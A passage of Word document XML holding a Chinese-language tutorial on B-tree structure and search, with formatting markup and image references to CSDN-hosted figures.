          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kn</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ki</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i=1,2,…,n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）为关键码，且</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ki&lt;Ki+1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Ai</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为指向子树根结点的指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(i=0,1,…,n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，且指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ai-1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所指子树中所有结点的关键码均小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ki (i=1,2,…,n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所指子树中所有结点的关键码均大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D153A9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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           </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1602105" cy="205105"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="6" name="图片 6" descr="http://my.csdn.net/uploads/201207/28/1343441678_689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my.csdn.net/uploads/201207/28/1343441678_6896.jpg"/>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1602105" cy="205105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为关键码的个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⑸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所有的叶子结点都出现在同一层次上，并且不带信息（可以看作是外部结点或查找失败的结点，实际上这些结点不存在，指向这些结点的指针为空）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即所有叶节点具有相同的深度，等于树高度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如一棵四阶</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树，其深度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3811220" cy="1711757"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="5" name="图片 5" descr="http://my.csdn.net/uploads/201207/28/1343441845_40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my.csdn.net/uploads/201207/28/1343441845_4081.jpg"/>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3811270" cy="1711779"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树的查找类似二叉排序树的查找，所不同的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树每个结点上是多关键码的有序表</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在到达某个结点时，先在有序表中查找，若找到，则查找成功；否则，到按照对应的指针信息指向的子树中去查找，当到达叶子结点时，则说明树中没有对应的关键码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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在上图的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树上查找关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）首先从更开始，根据根节点指针找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节点，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> *a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节点中只有一个关键字，且给定值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>47 &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则若存在必在指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所指的子树内。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）顺指针找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> *c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节点，该节点有两个关键字（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 78</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>43 &lt; 47 &lt; 78,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>若存在比在指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
